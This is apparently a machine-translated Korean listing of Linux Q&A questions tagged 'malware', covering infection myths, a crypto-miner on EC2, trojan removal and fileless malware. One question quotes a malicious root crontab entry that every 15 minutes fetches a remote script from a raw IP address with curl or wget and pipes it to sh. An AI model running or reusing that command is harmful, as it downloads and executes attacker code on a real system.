«malware» 태그된 질문

9
유닉스 / 리눅스의 악성 코드에 대한 신화
Linux 상자가 맬웨어에 감염 될 수 있습니까? 나는 내가 아는 사람에게 일어난 일에 대해 들어 본 적이 없으며 그것이 불가능하다는 것을 몇 번이나 들었습니다. 그게 사실입니까? 그렇다면 Linux 안티 바이러스 (보안) 소프트웨어의 문제점은 무엇입니까?
142 security  malware 

2
15 분마다 'xribfa4'를 실행하는 의심스러운 크론 탭 항목
내 Raspberry Pi의 루트 crontab 파일에 무언가를 추가하고 싶었고 의심스러운 것 같은 항목을 발견하여 Google에서 일부를 검색해도 아무것도 나타나지 않았습니다. Crontab 항목 : */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh 내용 http://103.219.112.66:8000/i.sh은 다음 과 같습니다. export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir -p /var/spool/cron/crontabs echo "" …
58 security  cron  malware 

8
관리자 또는 sudo 권한이없는 사용자가 맬웨어를 실행하면 시스템이 손상 될 수 있습니까? [닫은]
최근 Linux를 실행하는 컴퓨터에서 침입 한 후 암호가 약한 사용자의 홈 폴더에서 실행 파일을 찾았습니다. 모든 손상으로 보이는 부분을 정리했지만 완전히 닦을 준비를하고 있습니다. Non-sudo 또는 권한이없는 사용자가 맬웨어를 실행할 수있는 것은 무엇입니까? 감염 가능한 세계 쓰기 가능 권한이 표시된 파일을 찾고 있습니까? 관리자가 아닌 사용자가 대부분의 Linux 시스템에서 할 …
30 security  malware 

2
AWS EC2 인스턴스에서 지뢰 멀웨어를 어떻게 죽일 수 있습니까? (손상된 서버)
비트 코인을 지속적으로 채굴하고 인스턴스 처리 능력을 사용하는 EC2 인스턴스에서 악성 코드를 발견했습니다. 프로세스를 성공적으로 식별했지만 제거 및 종료 할 수 없습니다. 이 명령을 watch "ps aux | sort -nrk 3,3 | head -n 5" 실행했습니다. 인스턴스에서 실행중인 상위 5 개 프로세스를 보여줍니다. 이 프로세스에서 CPU의 30 %를 소비 하는 …
26 linux  process  kill  malware 


4
리눅스 트로이 목마를 탐지하고 제거하는 방법?
나는 최근에 이것을 다시 우연히 발견했다. 거의 1 년 동안 Linux 트로이 목마가 주목받지 못함 (Unreal IRCd) 예, 신뢰할 수없는 출처에서 임의의 PPA / 소프트웨어를 추가하면 문제가 발생한다는 것을 알고 있습니다. 나는 그렇게하지 않지만 많은 사람들이한다 (많은 Linux 블로그와 타블로이드는 시스템을 손상 시키거나 여전히 악화되어 보안을 손상시킬 수 있음을 경고하지 …
16 security  malware 


2
파일리스 악성 코드는 리눅스에서 어떻게 작동합니까?
파일없는 악성 코드의 정의를 이해합니다. 파일 기반이 아니지만 메모리에만 존재하는 악성 코드… 더 구체적으로, 파일이없는 악성 코드… 메모리의 활성 프로세스에 자신을 추가합니다… 누군가 메모리의 활성 프로세스에 어떻게 추가되는지 설명해 주시겠습니까? 또한 이러한 공격에 대해 어떤 (커널) 보호 / 경화가 가능합니까?
당사 사이트를 사용함과 동시에 당사의 쿠키 정책개인정보 보호정책을 읽고 이해하였음을 인정하는 것으로 간주합니다.
Licensed under cc by-sa 3.0 with attribution required.